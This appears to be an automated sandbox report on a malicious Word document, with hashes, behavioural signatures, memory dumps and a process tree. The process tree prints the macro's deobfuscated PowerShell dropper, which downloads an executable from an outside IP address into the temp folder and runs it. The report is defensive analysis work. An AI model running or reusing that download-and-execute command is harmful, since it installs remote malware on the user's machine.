Analysis

  • max time kernel
    166s
  • max time network
    194s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2022 21:40

General

  • Target

    60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976.doc

  • Size

    41KB

  • MD5

    ac5e2c5bf3ba98b1d0fab9b762dc18b5

  • SHA1

    d4b5de6534f3bc78d69c551394cf93d2ae99c8f4

  • SHA256

    60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976

  • SHA512

    018c0eaada7b987ca3c5f0afbf8e2ba54ebc28c0e71da6ebb36e7c7272b1d5d1380b0b77d2868ef7ba66aeb24a25dc6865614cbad3accedd39abf16bdcb4a51e

  • SSDEEP

    384:uvc2AjFPbVOJ3J9isMjWCGSWba/JVZ0jLYAxmtV:8OTu3XaXW2dEYAO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.48.56.62:8080/hhacz45a/mnnmz.php

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4996
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','C:\Users\Admin\AppData\Local\Temp\pJIOfdfs.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\pJIOfdfs.exe';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4092

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4092-144-0x00007FFB68300000-0x00007FFB68DC1000-memory.dmp
    Filesize

    10.8MB

  • memory/4092-143-0x00007FFB68300000-0x00007FFB68DC1000-memory.dmp
    Filesize

    10.8MB

  • memory/4092-142-0x00007FFB68300000-0x00007FFB68DC1000-memory.dmp
    Filesize

    10.8MB

  • memory/4092-141-0x000001F125F40000-0x000001F125F62000-memory.dmp
    Filesize

    136KB

  • memory/4092-140-0x0000000000000000-mapping.dmp
  • memory/4988-139-0x0000000000000000-mapping.dmp
  • memory/4996-135-0x00007FFB54410000-0x00007FFB54420000-memory.dmp
    Filesize

    64KB

  • memory/4996-138-0x00007FFB51AB0000-0x00007FFB51AC0000-memory.dmp
    Filesize

    64KB

  • memory/4996-137-0x00007FFB51AB0000-0x00007FFB51AC0000-memory.dmp
    Filesize

    64KB

  • memory/4996-136-0x00007FFB54410000-0x00007FFB54420000-memory.dmp
    Filesize

    64KB

  • memory/4996-132-0x00007FFB54410000-0x00007FFB54420000-memory.dmp
    Filesize

    64KB

  • memory/4996-133-0x00007FFB54410000-0x00007FFB54420000-memory.dmp
    Filesize

    64KB

  • memory/4996-134-0x00007FFB54410000-0x00007FFB54420000-memory.dmp
    Filesize

    64KB